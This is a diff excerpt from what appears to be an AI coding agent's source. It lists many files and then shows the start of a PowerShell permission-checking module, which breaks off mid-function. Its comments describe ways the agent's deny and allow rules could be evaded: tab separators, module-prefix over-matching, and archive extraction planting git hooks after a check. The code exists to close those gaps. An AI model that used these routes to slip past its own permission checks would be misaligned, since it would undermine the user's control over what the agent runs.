  1555. package/src/utils/hooks/hooksConfigManager.ts +400 -0
  1556. package/src/utils/hooks/hooksConfigSnapshot.ts +133 -0
  1557. package/src/utils/hooks/hooksSettings.ts +271 -0
  1558. package/src/utils/hooks/postSamplingHooks.ts +70 -0
  1559. package/src/utils/hooks/registerFrontmatterHooks.ts +67 -0
  1560. package/src/utils/hooks/registerSkillHooks.ts +64 -0
  1561. package/src/utils/hooks/sessionHooks.ts +447 -0
  1562. package/src/utils/hooks/skillImprovement.ts +267 -0
  1563. package/src/utils/hooks/ssrfGuard.ts +294 -0
  1564. package/src/utils/hooks.ts +5022 -0
  1565. package/src/utils/horizontalScroll.ts +137 -0
  1566. package/src/utils/http.ts +136 -0
  1567. package/src/utils/hyperlink.ts +39 -0
  1568. package/src/utils/iTermBackup.ts +73 -0
  1569. package/src/utils/ide.ts +1494 -0
  1570. package/src/utils/idePathConversion.ts +90 -0
  1571. package/src/utils/idleTimeout.ts +53 -0
  1572. package/src/utils/imagePaste.ts +416 -0
  1573. package/src/utils/imageResizer.ts +880 -0
  1574. package/src/utils/imageStore.ts +167 -0
  1575. package/src/utils/imageValidation.ts +104 -0
  1576. package/src/utils/immediateCommand.ts +15 -0
  1577. package/src/utils/inProcessTeammateHelpers.ts +102 -0
  1578. package/src/utils/ink.ts +26 -0
  1579. package/src/utils/intl.ts +94 -0
  1580. package/src/utils/jetbrains.ts +191 -0
  1581. package/src/utils/json.ts +277 -0
  1582. package/src/utils/jsonRead.ts +16 -0
  1583. package/src/utils/keyboardShortcuts.ts +14 -0
  1584. package/src/utils/lazySchema.ts +8 -0
  1585. package/src/utils/listSessionsImpl.ts +454 -0
  1586. package/src/utils/localInstaller.ts +162 -0
  1587. package/src/utils/lockfile.ts +43 -0
  1588. package/src/utils/log.ts +362 -0
  1589. package/src/utils/logoV2Utils.ts +350 -0
  1590. package/src/utils/mailbox.ts +73 -0
  1591. package/src/utils/managedEnv.ts +199 -0
  1592. package/src/utils/managedEnvConstants.ts +191 -0
  1593. package/src/utils/markdown.ts +381 -0
  1594. package/src/utils/markdownConfigLoader.ts +600 -0
  1595. package/src/utils/mcp/dateTimeParser.ts +121 -0
  1596. package/src/utils/mcp/elicitationValidation.ts +336 -0
  1597. package/src/utils/mcpInstructionsDelta.ts +130 -0
  1598. package/src/utils/mcpOutputStorage.ts +189 -0
  1599. package/src/utils/mcpValidation.ts +208 -0
  1600. package/src/utils/mcpWebSocketTransport.ts +200 -0
  1601. package/src/utils/memoize.ts +269 -0
  1602. package/src/utils/memory/types.ts +12 -0
  1603. package/src/utils/memory/versions.ts +8 -0
  1604. package/src/utils/memoryFileDetection.ts +289 -0
  1605. package/src/utils/messagePredicates.ts +8 -0
  1606. package/src/utils/messageQueueManager.ts +547 -0
  1607. package/src/utils/messages/mappers.ts +290 -0
  1608. package/src/utils/messages/systemInit.ts +96 -0
  1609. package/src/utils/messages.ts +5512 -0
  1610. package/src/utils/model/agent.ts +157 -0
  1611. package/src/utils/model/aliases.ts +25 -0
  1612. package/src/utils/model/antModels.ts +64 -0
  1613. package/src/utils/model/bedrock.ts +265 -0
  1614. package/src/utils/model/check1mAccess.ts +72 -0
  1615. package/src/utils/model/configs.ts +118 -0
  1616. package/src/utils/model/contextWindowUpgradeCheck.ts +47 -0
  1617. package/src/utils/model/deprecation.ts +101 -0
  1618. package/src/utils/model/model.ts +634 -0
  1619. package/src/utils/model/modelAllowlist.ts +170 -0
  1620. package/src/utils/model/modelCapabilities.ts +118 -0
  1621. package/src/utils/model/modelOptions.ts +540 -0
  1622. package/src/utils/model/modelStrings.ts +166 -0
  1623. package/src/utils/model/modelSupportOverrides.ts +50 -0
  1624. package/src/utils/model/providers.ts +46 -0
  1625. package/src/utils/model/validateModel.ts +159 -0
  1626. package/src/utils/modelCost.ts +235 -0
  1627. package/src/utils/modifiers.ts +36 -0
  1628. package/src/utils/mtls.ts +179 -0
  1629. package/src/utils/nativeInstaller/download.ts +523 -0
  1630. package/src/utils/nativeInstaller/index.ts +18 -0
  1631. package/src/utils/nativeInstaller/installer.ts +1708 -0
  1632. package/src/utils/nativeInstaller/packageManagers.ts +336 -0
  1633. package/src/utils/nativeInstaller/pidLock.ts +433 -0
  1634. package/src/utils/notebook.ts +224 -0
  1635. package/src/utils/objectGroupBy.ts +18 -0
  1636. package/src/utils/pasteStore.ts +104 -0
  1637. package/src/utils/path.ts +155 -0
  1638. package/src/utils/pdf.ts +300 -0
  1639. package/src/utils/pdfUtils.ts +70 -0
  1640. package/src/utils/peerAddress.ts +21 -0
  1641. package/src/utils/permissions/PermissionMode.ts +141 -0
  1642. package/src/utils/permissions/PermissionPromptToolResultSchema.ts +127 -0
  1643. package/src/utils/permissions/PermissionResult.ts +35 -0
  1644. package/src/utils/permissions/PermissionRule.ts +40 -0
  1645. package/src/utils/permissions/PermissionUpdate.ts +389 -0
  1646. package/src/utils/permissions/PermissionUpdateSchema.ts +78 -0
  1647. package/src/utils/permissions/autoModeState.ts +39 -0
  1648. package/src/utils/permissions/bashClassifier.ts +61 -0
  1649. package/src/utils/permissions/bypassPermissionsKillswitch.ts +155 -0
  1650. package/src/utils/permissions/classifierDecision.ts +98 -0
  1651. package/src/utils/permissions/classifierShared.ts +39 -0
  1652. package/src/utils/permissions/dangerousPatterns.ts +80 -0
  1653. package/src/utils/permissions/denialTracking.ts +45 -0
  1654. package/src/utils/permissions/filesystem.ts +1777 -0
  1655. package/src/utils/permissions/getNextPermissionMode.ts +101 -0
  1656. package/src/utils/permissions/pathValidation.ts +485 -0
  1657. package/src/utils/permissions/permissionExplainer.ts +250 -0
  1658. package/src/utils/permissions/permissionRuleParser.ts +198 -0
  1659. package/src/utils/permissions/permissionSetup.ts +1532 -0
  1660. package/src/utils/permissions/permissions.ts +1486 -0
  1661. package/src/utils/permissions/permissionsLoader.ts +296 -0
  1662. package/src/utils/permissions/shadowedRuleDetection.ts +234 -0
  1663. package/src/utils/permissions/shellRuleMatching.ts +228 -0
  1664. package/src/utils/permissions/yoloClassifier.ts +1495 -0
  1665. package/src/utils/planModeV2.ts +95 -0
  1666. package/src/utils/plans.ts +397 -0
  1667. package/src/utils/platform.ts +150 -0
  1668. package/src/utils/plugins/addDirPluginSettings.ts +71 -0
  1669. package/src/utils/plugins/cacheUtils.ts +196 -0
  1670. package/src/utils/plugins/dependencyResolver.ts +305 -0
  1671. package/src/utils/plugins/fetchTelemetry.ts +135 -0
  1672. package/src/utils/plugins/gitAvailability.ts +69 -0
  1673. package/src/utils/plugins/headlessPluginInstall.ts +174 -0
  1674. package/src/utils/plugins/hintRecommendation.ts +164 -0
  1675. package/src/utils/plugins/installCounts.ts +292 -0
  1676. package/src/utils/plugins/installedPluginsManager.ts +1268 -0
  1677. package/src/utils/plugins/loadPluginAgents.ts +348 -0
  1678. package/src/utils/plugins/loadPluginCommands.ts +946 -0
  1679. package/src/utils/plugins/loadPluginHooks.ts +287 -0
  1680. package/src/utils/plugins/loadPluginOutputStyles.ts +178 -0
  1681. package/src/utils/plugins/lspPluginIntegration.ts +387 -0
  1682. package/src/utils/plugins/lspRecommendation.ts +374 -0
  1683. package/src/utils/plugins/managedPlugins.ts +27 -0
  1684. package/src/utils/plugins/marketplaceHelpers.ts +592 -0
  1685. package/src/utils/plugins/marketplaceManager.ts +2643 -0
  1686. package/src/utils/plugins/mcpPluginIntegration.ts +634 -0
  1687. package/src/utils/plugins/mcpbHandler.ts +968 -0
  1688. package/src/utils/plugins/officialMarketplace.ts +25 -0
  1689. package/src/utils/plugins/officialMarketplaceGcs.ts +216 -0
  1690. package/src/utils/plugins/officialMarketplaceStartupCheck.ts +439 -0
  1691. package/src/utils/plugins/orphanedPluginFilter.ts +114 -0
  1692. package/src/utils/plugins/parseMarketplaceInput.ts +162 -0
  1693. package/src/utils/plugins/performStartupChecks.tsx +70 -0
  1694. package/src/utils/plugins/pluginAutoupdate.ts +284 -0
  1695. package/src/utils/plugins/pluginBlocklist.ts +127 -0
  1696. package/src/utils/plugins/pluginDirectories.ts +178 -0
  1697. package/src/utils/plugins/pluginFlagging.ts +208 -0
  1698. package/src/utils/plugins/pluginIdentifier.ts +123 -0
  1699. package/src/utils/plugins/pluginInstallationHelpers.ts +595 -0
  1700. package/src/utils/plugins/pluginLoader.ts +3302 -0
  1701. package/src/utils/plugins/pluginOptionsStorage.ts +400 -0
  1702. package/src/utils/plugins/pluginPolicy.ts +20 -0
  1703. package/src/utils/plugins/pluginStartupCheck.ts +341 -0
  1704. package/src/utils/plugins/pluginVersioning.ts +157 -0
  1705. package/src/utils/plugins/reconciler.ts +265 -0
  1706. package/src/utils/plugins/refresh.ts +215 -0
  1707. package/src/utils/plugins/schemas.ts +1681 -0
  1708. package/src/utils/plugins/validatePlugin.ts +903 -0
  1709. package/src/utils/plugins/walkPluginMarkdown.ts +69 -0
  1710. package/src/utils/plugins/zipCache.ts +406 -0
  1711. package/src/utils/plugins/zipCacheAdapters.ts +164 -0
  1712. package/src/utils/powershell/dangerousCmdlets.ts +185 -0
  1713. package/src/utils/powershell/parser.ts +1804 -0
  1714. package/src/utils/powershell/staticPrefix.ts +316 -0
  1715. package/src/utils/preflightChecks.tsx +151 -0
  1716. package/src/utils/privacyLevel.ts +55 -0
  1717. package/src/utils/process.ts +68 -0
  1718. package/src/utils/processUserInput/processBashCommand.tsx +140 -0
  1719. package/src/utils/processUserInput/processSlashCommand.tsx +922 -0
  1720. package/src/utils/processUserInput/processTextPrompt.ts +100 -0
  1721. package/src/utils/processUserInput/processUserInput.ts +605 -0
  1722. package/src/utils/profilerBase.ts +46 -0
  1723. package/src/utils/promptCategory.ts +49 -0
  1724. package/src/utils/promptEditor.ts +188 -0
  1725. package/src/utils/promptShellExecution.ts +183 -0
  1726. package/src/utils/proxy.ts +426 -0
  1727. package/src/utils/queryContext.ts +179 -0
  1728. package/src/utils/queryHelpers.ts +552 -0
  1729. package/src/utils/queryProfiler.ts +301 -0
  1730. package/src/utils/queueProcessor.ts +95 -0
  1731. package/src/utils/readEditContext.ts +227 -0
  1732. package/src/utils/readFileInRange.ts +383 -0
  1733. package/src/utils/releaseNotes.ts +360 -0
  1734. package/src/utils/renderOptions.ts +77 -0
  1735. package/src/utils/ripgrep.ts +679 -0
  1736. package/src/utils/sandbox/sandbox-adapter.ts +985 -0
  1737. package/src/utils/sandbox/sandbox-ui-utils.ts +12 -0
  1738. package/src/utils/sanitization.ts +91 -0
  1739. package/src/utils/screenshotClipboard.ts +121 -0
  1740. package/src/utils/sdkEventQueue.ts +134 -0
  1741. package/src/utils/secureStorage/fallbackStorage.ts +70 -0
  1742. package/src/utils/secureStorage/index.ts +17 -0
  1743. package/src/utils/secureStorage/keychainPrefetch.ts +116 -0
  1744. package/src/utils/secureStorage/macOsKeychainHelpers.ts +111 -0
  1745. package/src/utils/secureStorage/macOsKeychainStorage.ts +231 -0
  1746. package/src/utils/secureStorage/plainTextStorage.ts +84 -0
  1747. package/src/utils/semanticBoolean.ts +29 -0
  1748. package/src/utils/semanticNumber.ts +36 -0
  1749. package/src/utils/semver.ts +59 -0
  1750. package/src/utils/sequential.ts +56 -0
  1751. package/src/utils/sessionActivity.ts +133 -0
  1752. package/src/utils/sessionEnvVars.ts +22 -0
  1753. package/src/utils/sessionEnvironment.ts +166 -0
  1754. package/src/utils/sessionFileAccessHooks.ts +250 -0
  1755. package/src/utils/sessionIngressAuth.ts +140 -0
  1756. package/src/utils/sessionRestore.ts +551 -0
  1757. package/src/utils/sessionStart.ts +232 -0
  1758. package/src/utils/sessionState.ts +150 -0
  1759. package/src/utils/sessionStorage.ts +5105 -0
  1760. package/src/utils/sessionStoragePortable.ts +793 -0
  1761. package/src/utils/sessionTitle.ts +129 -0
  1762. package/src/utils/sessionUrl.ts +64 -0
  1763. package/src/utils/set.ts +53 -0
  1764. package/src/utils/settings/allErrors.ts +32 -0
  1765. package/src/utils/settings/applySettingsChange.ts +92 -0
  1766. package/src/utils/settings/changeDetector.ts +488 -0
  1767. package/src/utils/settings/constants.ts +202 -0
  1768. package/src/utils/settings/internalWrites.ts +37 -0
  1769. package/src/utils/settings/managedPath.ts +34 -0
  1770. package/src/utils/settings/mdm/constants.ts +81 -0
  1771. package/src/utils/settings/mdm/rawRead.ts +130 -0
  1772. package/src/utils/settings/mdm/settings.ts +316 -0
  1773. package/src/utils/settings/permissionValidation.ts +262 -0
  1774. package/src/utils/settings/pluginOnlyPolicy.ts +60 -0
  1775. package/src/utils/settings/schemaOutput.ts +8 -0
  1776. package/src/utils/settings/settings.ts +1015 -0
  1777. package/src/utils/settings/settingsCache.ts +80 -0
  1778. package/src/utils/settings/toolValidationConfig.ts +103 -0
  1779. package/src/utils/settings/types.ts +1148 -0
  1780. package/src/utils/settings/validateEditTool.ts +45 -0
  1781. package/src/utils/settings/validation.ts +265 -0
  1782. package/src/utils/settings/validationTips.ts +164 -0
  1783. package/src/utils/shell/bashProvider.ts +255 -0
  1784. package/src/utils/shell/outputLimits.ts +14 -0
  1785. package/src/utils/shell/powershellDetection.ts +107 -0
  1786. package/src/utils/shell/powershellProvider.ts +123 -0
  1787. package/src/utils/shell/prefix.ts +367 -0
  1788. package/src/utils/shell/readOnlyCommandValidation.ts +1893 -0
  1789. package/src/utils/shell/resolveDefaultShell.ts +14 -0
  1790. package/src/utils/shell/shellProvider.ts +33 -0
  1791. package/src/utils/shell/shellToolUtils.ts +22 -0
  1792. package/src/utils/shell/specPrefix.ts +241 -0
  1793. package/src/utils/shellConfig.ts +167 -0
  1794. package/src/utils/sideQuery.ts +222 -0
  1795. package/src/utils/sideQuestion.ts +155 -0
  1796. package/src/utils/signal.ts +43 -0
  1797. package/src/utils/sinks.ts +16 -0
  1798. package/src/utils/skills/skillChangeDetector.ts +311 -0
  1799. package/src/utils/slashCommandParsing.ts +60 -0
  1800. package/src/utils/sleep.ts +84 -0
  1801. package/src/utils/sliceAnsi.ts +91 -0
  1802. package/src/utils/slowOperations.ts +286 -0
  1803. package/src/utils/standaloneAgent.ts +23 -0
  1804. package/src/utils/startupProfiler.ts +194 -0
  1805. package/src/utils/staticRender.tsx +116 -0
  1806. package/src/utils/stats.ts +1061 -0
  1807. package/src/utils/statsCache.ts +434 -0
  1808. package/src/utils/status.tsx +362 -0
  1809. package/src/utils/statusNoticeDefinitions.tsx +198 -0
  1810. package/src/utils/statusNoticeHelpers.ts +20 -0
  1811. package/src/utils/stream.ts +76 -0
  1812. package/src/utils/streamJsonStdoutGuard.ts +123 -0
  1813. package/src/utils/streamlinedTransform.ts +201 -0
  1814. package/src/utils/stringUtils.ts +235 -0
  1815. package/src/utils/subprocessEnv.ts +99 -0
  1816. package/src/utils/suggestions/commandSuggestions.ts +567 -0
  1817. package/src/utils/suggestions/directoryCompletion.ts +263 -0
  1818. package/src/utils/suggestions/shellHistoryCompletion.ts +119 -0
  1819. package/src/utils/suggestions/skillUsageTracking.ts +55 -0
  1820. package/src/utils/suggestions/slackChannelSuggestions.ts +209 -0
  1821. package/src/utils/swarm/It2SetupPrompt.tsx +380 -0
  1822. package/src/utils/swarm/backends/ITermBackend.ts +370 -0
  1823. package/src/utils/swarm/backends/InProcessBackend.ts +339 -0
  1824. package/src/utils/swarm/backends/PaneBackendExecutor.ts +354 -0
  1825. package/src/utils/swarm/backends/TmuxBackend.ts +764 -0
  1826. package/src/utils/swarm/backends/detection.ts +128 -0
  1827. package/src/utils/swarm/backends/it2Setup.ts +245 -0
  1828. package/src/utils/swarm/backends/registry.ts +464 -0
  1829. package/src/utils/swarm/backends/teammateModeSnapshot.ts +87 -0
  1830. package/src/utils/swarm/backends/types.ts +311 -0
  1831. package/src/utils/swarm/constants.ts +33 -0
  1832. package/src/utils/swarm/inProcessRunner.ts +1552 -0
  1833. package/src/utils/swarm/leaderPermissionBridge.ts +54 -0
  1834. package/src/utils/swarm/permissionSync.ts +928 -0
  1835. package/src/utils/swarm/reconnection.ts +119 -0
  1836. package/src/utils/swarm/spawnInProcess.ts +328 -0
  1837. package/src/utils/swarm/spawnUtils.ts +146 -0
  1838. package/src/utils/swarm/teamHelpers.ts +683 -0
  1839. package/src/utils/swarm/teammateInit.ts +129 -0
  1840. package/src/utils/swarm/teammateLayoutManager.ts +107 -0
  1841. package/src/utils/swarm/teammateModel.ts +10 -0
  1842. package/src/utils/swarm/teammatePromptAddendum.ts +18 -0
  1843. package/src/utils/systemDirectories.ts +74 -0
  1844. package/src/utils/systemPrompt.ts +123 -0
  1845. package/src/utils/systemPromptType.ts +14 -0
  1846. package/src/utils/systemTheme.ts +119 -0
  1847. package/src/utils/taggedId.ts +54 -0
  1848. package/src/utils/task/TaskOutput.ts +390 -0
  1849. package/src/utils/task/diskOutput.ts +451 -0
  1850. package/src/utils/task/framework.ts +308 -0
  1851. package/src/utils/task/outputFormatting.ts +38 -0
  1852. package/src/utils/task/sdkProgress.ts +36 -0
  1853. package/src/utils/tasks.ts +862 -0
  1854. package/src/utils/teamDiscovery.ts +81 -0
  1855. package/src/utils/teamMemoryOps.ts +88 -0
  1856. package/src/utils/teammate.ts +292 -0
  1857. package/src/utils/teammateContext.ts +96 -0
  1858. package/src/utils/teammateMailbox.ts +1183 -0
  1859. package/src/utils/telemetry/betaSessionTracing.ts +491 -0
  1860. package/src/utils/telemetry/bigqueryExporter.ts +252 -0
  1861. package/src/utils/telemetry/events.ts +75 -0
  1862. package/src/utils/telemetry/instrumentation.ts +825 -0
  1863. package/src/utils/telemetry/logger.ts +26 -0
  1864. package/src/utils/telemetry/perfettoTracing.ts +1120 -0
  1865. package/src/utils/telemetry/pluginTelemetry.ts +289 -0
  1866. package/src/utils/telemetry/sessionTracing.ts +927 -0
  1867. package/src/utils/telemetry/skillLoadedEvent.ts +39 -0
  1868. package/src/utils/telemetryAttributes.ts +71 -0
  1869. package/src/utils/teleport/api.ts +466 -0
  1870. package/src/utils/teleport/environmentSelection.ts +77 -0
  1871. package/src/utils/teleport/environments.ts +120 -0
  1872. package/src/utils/teleport/gitBundle.ts +292 -0
  1873. package/src/utils/teleport.tsx +1226 -0
  1874. package/src/utils/tempfile.ts +31 -0
  1875. package/src/utils/terminal.ts +131 -0
  1876. package/src/utils/terminalPanel.ts +191 -0
  1877. package/src/utils/textHighlighting.ts +166 -0
  1878. package/src/utils/theme.ts +639 -0
  1879. package/src/utils/thinking.ts +162 -0
  1880. package/src/utils/timeouts.ts +39 -0
  1881. package/src/utils/tmuxSocket.ts +427 -0
  1882. package/src/utils/todo/types.ts +18 -0
  1883. package/src/utils/tokenBudget.ts +73 -0
  1884. package/src/utils/tokens.ts +261 -0
  1885. package/src/utils/toolErrors.ts +132 -0
  1886. package/src/utils/toolPool.ts +79 -0
  1887. package/src/utils/toolResultStorage.ts +1040 -0
  1888. package/src/utils/toolSchemaCache.ts +26 -0
  1889. package/src/utils/toolSearch.ts +756 -0
  1890. package/src/utils/transcriptSearch.ts +202 -0
  1891. package/src/utils/treeify.ts +170 -0
  1892. package/src/utils/truncate.ts +179 -0
  1893. package/src/utils/ultraplan/ccrSession.ts +349 -0
  1894. package/src/utils/ultraplan/keyword.ts +127 -0
  1895. package/src/utils/ultraplan/prompt.txt +1 -0
  1896. package/src/utils/unaryLogging.ts +39 -0
  1897. package/src/utils/undercover.ts +89 -0
  1898. package/src/utils/user.ts +194 -0
  1899. package/src/utils/userAgent.ts +10 -0
  1900. package/src/utils/userPromptKeywords.ts +27 -0
  1901. package/src/utils/uuid.ts +27 -0
  1902. package/src/utils/warningHandler.ts +121 -0
  1903. package/src/utils/which.ts +82 -0
  1904. package/src/utils/windowsPaths.ts +173 -0
  1905. package/src/utils/withResolvers.ts +13 -0
  1906. package/src/utils/words.ts +800 -0
  1907. package/src/utils/workloadContext.ts +57 -0
  1908. package/src/utils/worktree.ts +1519 -0
  1909. package/src/utils/worktreeModeEnabled.ts +11 -0
  1910. package/src/utils/xdg.ts +65 -0
  1911. package/src/utils/xml.ts +16 -0
  1912. package/src/utils/yaml.ts +15 -0
  1913. package/src/utils/zodToJsonSchema.ts +23 -0
  1914. package/src/vim/motions.ts +82 -0
  1915. package/src/vim/operators.ts +556 -0
  1916. package/src/vim/textObjects.ts +186 -0
  1917. package/src/vim/transitions.ts +490 -0
  1918. package/src/vim/types.ts +199 -0
  1919. package/src/voice/voiceModeEnabled.ts +54 -0
  1920. package/start.js +1 -0
@@ -0,0 +1,1648 @@
1
+ /**
2
+ * PowerShell-specific permission checking, adapted from bashPermissions.ts
3
+ * for case-insensitive cmdlet matching.
4
+ */
5
+
6
+ import { resolve } from 'path'
7
+ import type { ToolPermissionContext, ToolUseContext } from '../../Tool.js'
8
+ import type {
9
+ PermissionDecisionReason,
10
+ PermissionResult,
11
+ } from '../../types/permissions.js'
12
+ import { getCwd } from '../../utils/cwd.js'
13
+ import { isCurrentDirectoryBareGitRepo } from '../../utils/git.js'
14
+ import type { PermissionRule } from '../../utils/permissions/PermissionRule.js'
15
+ import type { PermissionUpdate } from '../../utils/permissions/PermissionUpdateSchema.js'
16
+ import {
17
+ createPermissionRequestMessage,
18
+ getRuleByContentsForToolName,
19
+ } from '../../utils/permissions/permissions.js'
20
+ import {
21
+ matchWildcardPattern,
22
+ parsePermissionRule,
23
+ type ShellPermissionRule,
24
+ suggestionForExactCommand as sharedSuggestionForExactCommand,
25
+ } from '../../utils/permissions/shellRuleMatching.js'
26
+ import {
27
+ classifyCommandName,
28
+ deriveSecurityFlags,
29
+ getAllCommandNames,
30
+ getFileRedirections,
31
+ type ParsedCommandElement,
32
+ type ParsedPowerShellCommand,
33
+ PS_TOKENIZER_DASH_CHARS,
34
+ parsePowerShellCommand,
35
+ stripModulePrefix,
36
+ } from '../../utils/powershell/parser.js'
37
+ import { containsVulnerableUncPath } from '../../utils/shell/readOnlyCommandValidation.js'
38
+ import { isDotGitPathPS, isGitInternalPathPS } from './gitSafety.js'
39
+ import {
40
+ checkPermissionMode,
41
+ isSymlinkCreatingCommand,
42
+ } from './modeValidation.js'
43
+ import {
44
+ checkPathConstraints,
45
+ dangerousRemovalDeny,
46
+ isDangerousRemovalRawPath,
47
+ } from './pathValidation.js'
48
+ import { powershellCommandIsSafe } from './powershellSecurity.js'
49
+ import {
50
+ argLeaksValue,
51
+ isAllowlistedCommand,
52
+ isCwdChangingCmdlet,
53
+ isProvablySafeStatement,
54
+ isReadOnlyCommand,
55
+ isSafeOutputCommand,
56
+ resolveToCanonical,
57
+ } from './readOnlyValidation.js'
58
+ import { POWERSHELL_TOOL_NAME } from './toolName.js'
59
+
60
+ // Matches `$var = `, `$var += `, `$env:X = `, `$x ??= ` etc. Used to strip
61
+ // nested assignment prefixes in the parse-failed fallback path.
62
+ const PS_ASSIGN_PREFIX_RE = /^\$[\w:]+\s*(?:[+\-*/%]|\?\?)?\s*=\s*/
63
+
64
+ /**
65
+ * Cmdlets that can place a file at a caller-specified path. The
66
+ * git-internal-paths guard checks whether any arg is a git-internal path
67
+ * (hooks/, refs/, objects/, HEAD). Non-creating writers (remove-item,
68
+ * clear-content) are intentionally absent — they can't plant new hooks.
69
+ */
70
+ const GIT_SAFETY_WRITE_CMDLETS = new Set([
71
+ 'new-item',
72
+ 'set-content',
73
+ 'add-content',
74
+ 'out-file',
75
+ 'copy-item',
76
+ 'move-item',
77
+ 'rename-item',
78
+ 'expand-archive',
79
+ 'invoke-webrequest',
80
+ 'invoke-restmethod',
81
+ 'tee-object',
82
+ 'export-csv',
83
+ 'export-clixml',
84
+ ])
85
+
86
+ /**
87
+ * External archive-extraction applications that write files to cwd with
88
+ * archive-controlled paths. `tar -xf payload.tar; git status` defeats
89
+ * isCurrentDirectoryBareGitRepo (TOCTOU): the check runs at
90
+ * permission-eval time, tar extracts HEAD/hooks/refs/ AFTER the check and
91
+ * BEFORE git runs. Unlike GIT_SAFETY_WRITE_CMDLETS (where we can inspect
92
+ * args for git-internal paths), archive contents are opaque — any
93
+ * extraction preceding git must ask. Matched by name only (lowercase,
94
+ * with and without .exe).
95
+ */
96
+ const GIT_SAFETY_ARCHIVE_EXTRACTORS = new Set([
97
+ 'tar',
98
+ 'tar.exe',
99
+ 'bsdtar',
100
+ 'bsdtar.exe',
101
+ 'unzip',
102
+ 'unzip.exe',
103
+ '7z',
104
+ '7z.exe',
105
+ '7za',
106
+ '7za.exe',
107
+ 'gzip',
108
+ 'gzip.exe',
109
+ 'gunzip',
110
+ 'gunzip.exe',
111
+ 'expand-archive',
112
+ ])
113
+
114
+ /**
115
+ * Extract the command name from a PowerShell command string.
116
+ * Uses the parser to get the first command name from the AST.
117
+ */
118
+ async function extractCommandName(command: string): Promise<string> {
119
+ const trimmed = command.trim()
120
+ if (!trimmed) {
121
+ return ''
122
+ }
123
+ const parsed = await parsePowerShellCommand(trimmed)
124
+ const names = getAllCommandNames(parsed)
125
+ return names[0] ?? ''
126
+ }
127
+
128
+ /**
129
+ * Parse a permission rule string into a structured rule object.
130
+ * Delegates to shared parsePermissionRule.
131
+ */
132
+ export function powershellPermissionRule(
133
+ permissionRule: string,
134
+ ): ShellPermissionRule {
135
+ return parsePermissionRule(permissionRule)
136
+ }
137
+
138
+ /**
139
+ * Generate permission update suggestion for exact command match.
140
+ *
141
+ * Skip exact-command suggestion for commands that can't round-trip cleanly:
142
+ * - Multi-line: newlines don't survive normalization, rule would never match
143
+ * - Literal *: storing `Remove-Item * -Force` verbatim re-parses as a wildcard
144
+ * rule via hasWildcards() (matches `^Remove-Item .* -Force$`). Escaping to
145
+ * `\*` creates a dead rule — parsePermissionRule's exact branch returns the
146
+ * raw string with backslash intact, so `Remove-Item \* -Force` never matches
147
+ * the incoming `Remove-Item * -Force`. Globs are unsafe to exact-auto-allow
148
+ * anyway; prefix suggestion still offered. (finding #12)
149
+ */
150
+ function suggestionForExactCommand(command: string): PermissionUpdate[] {
151
+ if (command.includes('\n') || command.includes('*')) {
152
+ return []
153
+ }
154
+ return sharedSuggestionForExactCommand(POWERSHELL_TOOL_NAME, command)
155
+ }
156
+
157
+ /**
158
+ * PowerShell input schema type - simplified for initial implementation
159
+ */
160
+ type PowerShellInput = {
161
+ command: string
162
+ timeout?: number
163
+ }
164
+
165
+ /**
166
+ * Filter rules by contents matching an input command.
167
+ * PowerShell-specific: uses case-insensitive matching throughout.
168
+ * Follows the same structure as BashTool's local filterRulesByContentsMatchingInput.
169
+ */
170
+ function filterRulesByContentsMatchingInput(
171
+ input: PowerShellInput,
172
+ rules: Map<string, PermissionRule>,
173
+ matchMode: 'exact' | 'prefix',
174
+ behavior: 'deny' | 'ask' | 'allow',
175
+ ): PermissionRule[] {
176
+ const command = input.command.trim()
177
+
178
+ function strEquals(a: string, b: string): boolean {
179
+ return a.toLowerCase() === b.toLowerCase()
180
+ }
181
+ function strStartsWith(str: string, prefix: string): boolean {
182
+ return str.toLowerCase().startsWith(prefix.toLowerCase())
183
+ }
184
+ // SECURITY: stripModulePrefix on RULE names widens the
185
+ // secondary-canonical match — a deny rule `Module\Remove-Item:*` blocking
186
+ // `rm` is the intent (fail-safe over-match), but an allow rule
187
+ // `ModuleA\Get-Thing:*` also matching `ModuleB\Get-Thing` is fail-OPEN.
188
+ // Deny/ask over-match is fine; allow must never over-match.
189
+ function stripModulePrefixForRule(name: string): string {
190
+ if (behavior === 'allow') {
191
+ return name
192
+ }
193
+ return stripModulePrefix(name)
194
+ }
195
+
196
+ // Extract the first word (command name) from the input for canonical matching.
197
+ // Keep both raw (for slicing the original `command` string) and stripped
198
+ // (for canonical resolution) versions. For module-qualified inputs like
199
+ // `Microsoft.PowerShell.Utility\Invoke-Expression foo`, rawCmdName holds the
200
+ // full token so `command.slice(rawCmdName.length)` yields the correct rest.
201
+ const rawCmdName = command.split(/\s+/)[0] ?? ''
202
+ const inputCmdName = stripModulePrefix(rawCmdName)
203
+ const inputCanonical = resolveToCanonical(inputCmdName)
204
+
205
+ // Build a version of the command with the canonical name substituted
206
+ // e.g., 'rm foo.txt' -> 'remove-item foo.txt' so deny rules on Remove-Item also block rm.
207
+ // SECURITY: Normalize the whitespace separator between name and args to a
208
+ // single space. PowerShell accepts any whitespace (tab, etc.) as separator,
209
+ // but prefix rule matching uses `prefix + ' '` (literal space). Without this,
210
+ // `rm\t./x` canonicalizes to `remove-item\t./x` and misses the deny rule
211
+ // `Remove-Item:*`, while acceptEdits auto-allow (using AST cmd.name) still
212
+ // matches — a deny-rule bypass. Build unconditionally (not just when the
213
+ // canonical differs) so non-space-separated raw commands are also normalized.
214
+ const rest = command.slice(rawCmdName.length).replace(/^\s+/, ' ')
215
+ const canonicalCommand = inputCanonical + rest
216
+
217
+ return Array.from(rules.entries())
218
+ .filter(([ruleContent]) => {
219
+ const rule = powershellPermissionRule(ruleContent)
220
+
221
+ // Also resolve the rule's command name to canonical for cross-matching
222
+ // e.g., a deny rule for 'rm' should also block 'Remove-Item'
223
+ function matchesCommand(cmd: string): boolean {
224
+ switch (rule.type) {
225
+ case 'exact':
226
+ return strEquals(rule.command, cmd)
227
+ case 'prefix':
228
+ switch (matchMode) {
229
+ case 'exact':
230
+ return strEquals(rule.prefix, cmd)
231
+ case 'prefix': {
232
+ if (strEquals(cmd, rule.prefix)) {
233
+ return true
234
+ }
235
+ return strStartsWith(cmd, rule.prefix + ' ')
236
+ }
237
+ }
238
+ break
239
+ case 'wildcard':
240
+ if (matchMode === 'exact') {
241
+ return false
242
+ }
243
+ return matchWildcardPattern(rule.pattern, cmd, true)
244
+ }
245
+ }
246
+
247
+ // Check against the original command
248
+ if (matchesCommand(command)) {
249
+ return true
250
+ }
251
+
252
+ // Also check against the canonical form of the command
253
+ // This ensures 'deny Remove-Item' also blocks 'rm', 'del', 'ri', etc.
254
+ if (matchesCommand(canonicalCommand)) {
255
+ return true
256
+ }
257
+
258
